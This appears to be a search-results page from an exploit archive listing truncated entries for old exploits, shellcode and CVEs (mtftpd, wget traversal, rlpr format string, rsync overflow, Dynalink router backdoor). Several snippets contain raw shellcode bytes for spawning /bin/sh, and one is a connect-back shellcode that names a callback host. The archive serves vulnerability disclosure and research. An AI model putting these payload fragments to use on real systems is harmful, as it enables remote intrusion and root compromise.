430 matches found
mtftpd 0.0.3 - Remote Code Execution
mtftpd 0.0.3 - Remote Code Execution / \ mtftpd include include include include include include include include include include define PORT 21 define doit b0, b1, b2, b3, addr \ b0 = a...
adpl33t.txt
Adp Elite system is an invoice/purchase order suite very common in car dealerships. It's a telnet based system. When a user logs in via telnet, adp dumps the user into the program where the user can check on a vehicle's status, generate PO's and RO's, etc.... The program is rather large and runs ...
wget 1.9 - Directory Traversal
!/usr/bin/perl -W wgettrap.poc -- A POC for the wget1 directory traversal vulnerability Copyright 2004 Jan Min???? jjminar fastmail fm License: Public Domain When wget connects to us, we send it a HTTP redirect constructed so that wget wget will connect the second time, it will be attempting to...
linux/x86 execve /bin/sh alphanumeric 392 bytes
linux/x86 execve /bin/sh alphanumeric 392 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY"...
bsd/x86 - connect 93 bytes
bsd/x86 connect 93 bytes. Shellcode exploit for bsdx86 platform / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: po...
dynalink.Backdoor.txt
I was playing with a Dynalink RTA 230 http://www.dynalink.co.nz/products/rta230.htm, a linux based mips-cored adsl router. Looking at embedded linux system, i've found something like a backdoor: cat /etc/passwd admin:xxxxxobscuredxxxxx:0:0:Administrator:/:/bin/sh...
Dynalink routers backdoor?
I was playing with a Dynalink RTA 230 http://www.dynalink.co.nz/products/rta230.htm, a linux based mips-cored adsl router. Looking at embedded linux system, i've found something like a backdoor: cat /etc/passwd admin:xxxxxobscuredxxxxx:0:0:Administrator:/:/bin/sh...
CVE-2004-0186
smbmnt in Samba 2.x and 3.x on Linux 2.6, when installed setuid, allows local users to gain root privileges by mounting a Samba share that contains a setuid root program, whose setuid attributes are not cleared when the share is mounted...
CVE-2004-0602
The CVE-2004-0602 issue affects FreeBSD 4.x/5.x Linux binary compatibility mode. A programming error in handling certain Linux system calls can allow a local attacker to read/overwrite kernel memory, potentially gaining privileges or causing a system panic. Remediation in the connected docs inclu...
rlpr <= 2.04 msg() Remote Format String Exploit
Exploit for linux platform in category remote exploits =============================================== rlpr 0,1,2 lnxstagetwo = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" lnxstagetwo += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80" execute /bin/sh lnxstagetwo += "\x90" 100...
JetRoot_pl.txt
!/usr/bin/perl use IO::Socket; This is an exploit for HP Web JetAdmin, the printer management server from HP. It is NOT about printers! The service usually runs on port 8000 on Windows, Solaris or Linux boxes. Greetz: The Phenoelit People, c-base crew, EEyE rock!, Halvar on the other side of the...
rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation
rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation / rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode - linux-x86 - by bighawk bighawk warfare com...
----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------
----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========---------- Title: Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary Date: 08-08-2003 Platform: Only tested in Linux but can be exported to others. Impact: Users with exec perm over ./bin/onshowaudit can read...
Abyss Web Server 1.01.1 - Authentication Bypass
Abyss Web Server 1.01.1 - Authentication Bypass source: https://www.securityfocus.com/bid/9171/info It has been reported that Abyss Web Server is prone to an authentication bypass vulnerability that may allow an attacker to gain access to server resources. This issue may be carried out by accessi...
Abyss Web Server 1.0/1.1 - Authentication Bypass
source: https://www.securityfocus.com/bid/9171/info It has been reported that Abyss Web Server is prone to an authentication bypass vulnerability that may allow an attacker to gain access to server resources. This issue may be carried out by accessing a password protected directory under which th...
Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service
source: https://www.securityfocus.com/bid/8576/info It has been reported that Gordano Messaging Suite may be prone to a denial of service issue allowing a remote attacker to send malformed HTTP GET requests to cause the WWW.exe process to crash. The problme may lead to the termination of services...
GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit
Exploit for linux platform in category remote exploits ================================================= GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit ================================================= / gtkftpdv1.0.4and below: remote root buffer overflow exploit. by: vade79/v9 v9 at...
CVE-2003-0476
The execve system call in Linux 2.4.x records the file descriptor of the executable process in the file table of the calling process, which allows local users to gain read access to restricted file descriptors...
Slight privilege elevation from bin to root in IBM DB2 7.1 - 8.1 all binaries
Title: Local Vulnerability in IBM DB2 7.1 - 8.1 all binaries Date: 27-07-2003 Platform: Only tested in Linux but can be exported to others. Only versions 7.1 and Enterprise Server Edition v8.1 were checked but could affect other versions. Impact: Slight privilege elevation from bin to root. Autho...
WsMp3d 0.x - Remote Heap Overflow
WsMp3d 0.x - Remote Heap Overflow / Title: Remote Heap Corruption Overflow vulnerability in WsMp3d + Exploit: 0x82-Remote.WsMp3d.again.c bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2 WsMp3 Server Heap Corruption Remote root exploit by Xpl017Elz. + Hostname: 61.37.xxx.xx + Port num: 8000 +...